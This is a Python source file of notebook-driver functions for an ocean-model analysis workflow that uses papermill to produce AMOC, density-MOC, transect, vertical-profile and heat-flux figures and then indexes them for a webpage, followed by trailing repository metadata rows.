#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hovm_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{vname.capitalize()} at {str_boxregion}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
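# drive_xmoc: execute template_xmoc.ipynb once per configured variable and collect the results.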
def drive_xmoc(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
# current_params2.update(driver_settings[vname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_xmoc.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.upper()}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
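# drive_xmoc_tseries: loop over the latitudes in 'which_lats' (or 'max') and execute
# template_xmoc_tseries.ipynb to produce an AMOC time series figure per latitude.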
def drive_xmoc_tseries(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
# loop over the configured latitudes
for which_lat in driver_settings['which_lats']:
print(f' --> compute tseries @: {str(which_lat)}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_lat"] = [which_lat]
current_params2.update(driver_settings)
del current_params2["which_lats"]
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_xmoc_tseries.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
if which_lat == 'max':
webpage[f"image_{image_count}"]["name"] = f" max AMOC @ 30°N<lat<45°N"
else:
webpage[f"image_{image_count}"]["name"] = f" AMOC @ {which_lat}°N"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
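# drive_dmoc: execute template_dmoc.ipynb per variable; which_transf/do_zcoord are selected from the
# analysis_name suffix (dmoc, dmoc_srf, dmoc_inner and their *_z z-coordinate variants).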
def drive_dmoc(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for this analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
if analysis_name == 'dmoc' :
current_params2["which_transf"], str_mode = 'dmoc' , ''
elif analysis_name == 'dmoc_srf' :
current_params2["which_transf"], str_mode = 'srf' , '_srf'
elif analysis_name == 'dmoc_inner':
current_params2["which_transf"], str_mode = 'inner', '_inner'
elif analysis_name == 'dmoc_z':
current_params2["which_transf"], str_mode = 'dmoc', '_z'
current_params2["do_zcoord"] = True
elif analysis_name == 'dmoc_srf_z' :
current_params2["do_zcoord"] = True
current_params2["which_transf"], str_mode = 'srf' , '_srf_z'
elif analysis_name == 'dmoc_inner_z':
current_params2["which_transf"], str_mode = 'inner', '_inner_z'
current_params2["do_zcoord"] = True
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"Density-{vname.upper()}{str_mode}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc_tseries(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over the requested latitudes
for which_lat in driver_settings['which_lats']:
print(f' --> compute tseries @: {which_lat}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_lat"] = [which_lat]
current_params2.update(driver_settings)
del current_params2["which_lats"]
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc_tseries.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
if which_lat == 'max':
webpage[f"image_{image_count}"]["name"] = f" max density-AMOC @ 45°N<lat<60°N"
else:
webpage[f"image_{image_count}"]["name"] = f" density AMOC @ {which_lat}°N"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc_wdiap(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over the different isopycnals
for which_isopyc in driver_settings['which_isopycs']:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_isopyc"] = [which_isopyc]
current_params2.update(driver_settings)
del current_params2["which_isopycs"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
#_______________________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc_wdiap.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{'W_diap'} at sigma2={which_isopyc} kg/m^3"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc_srfcbflx(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over the different isopycnals
for which_isopyc in driver_settings['which_isopycs']:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_isopyc"] = [which_isopyc]
current_params2.update(driver_settings)
del current_params2["which_isopycs"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
#_______________________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc_srfcbflx.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{'srf. buoyancy transf.'} at sigma2={which_isopyc} kg/m^3"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_vprofile(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_vprofile.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.upper()}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_vprofile_clim(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_vprofile_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.capitalize()}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_transect(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
for tname in driver_settings[vname]:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname][tname])
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{tname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{tname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_transect.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{auxvname.upper()} @ {tname}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{tname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_transect_clim(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
for tname in driver_settings[vname]:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2.update(driver_settings[vname][tname])
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{tname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{tname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_transect_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.capitalize()} @ {tname} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{tname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_transect_vflx_t(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over the transect names
for tname in driver_settings:
print(f' --> compute: {tname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2.update(driver_settings[tname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{tname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{tname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_transect_vflx_t.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f" @ {tname}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{tname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_zmeantrans(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
# loop over the box regions
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
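# e.g. a box_region path such as 'boxes/NorthAtlantic.shp' (hypothetical) reduces to 'NorthAtlantic'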
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_zmeantransect.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{auxvname.capitalize()} at {str_boxregion} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_zmeantrans_clim(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
# loop over the box regions
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_zmeantransect_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{vname.capitalize()} at {str_boxregion} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_ghflx(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
print(f' --> compute ghflx:')
current_params2 = {}
current_params2 = current_params.copy()
#___________________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_ghflx.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f" GHFLX"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_mhflx(yaml_settings, analysis_name):
# copy yaml settings for this analysis driver --> yaml_settings[analysis_name]
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if the value is a dictionary it is not a primary parameter anymore, e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialise webpage for the analysis
webpage = {}
image_count = 0
print(f' --> compute mhflx:')
current_params2 = {}
current_params2 = current_params.copy()
#___________________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_mhflx.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#___________________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f" MHFLX"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}"
image_count += 1
return webpage
| 45.471108
| 151
| 0.616923
| 5,562
| 56,657
| 4.882057
| 0.032362
| 0.092804
| 0.048833
| 0.067614
| 0.965051
| 0.958754
| 0.953267
| 0.948332
| 0.937762
| 0.932275
| 0
| 0.01426
| 0.270982
| 56,657
| 1,245
| 152
| 45.507631
| 0.643013
| 0.245195
| 0
| 0.818554
| 0
| 0.016371
| 0.283393
| 0.153852
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025921
| false
| 0.025921
| 0.016371
| 0
| 0.068213
| 0.032742
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d318058a855326ca00936405aa9eb324001cc77
| 19,800
|
py
|
Python
|
001_philippine.py
|
bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015
|
a9acb6906ff141e7c24cff80f92efef7d7c3ff09
|
[
"BSD-2-Clause"
] | 1
|
2019-06-12T19:55:35.000Z
|
2019-06-12T19:55:35.000Z
|
001_philippine.py
|
bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015
|
a9acb6906ff141e7c24cff80f92efef7d7c3ff09
|
[
"BSD-2-Clause"
] | null | null | null |
001_philippine.py
|
bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015
|
a9acb6906ff141e7c24cff80f92efef7d7c3ff09
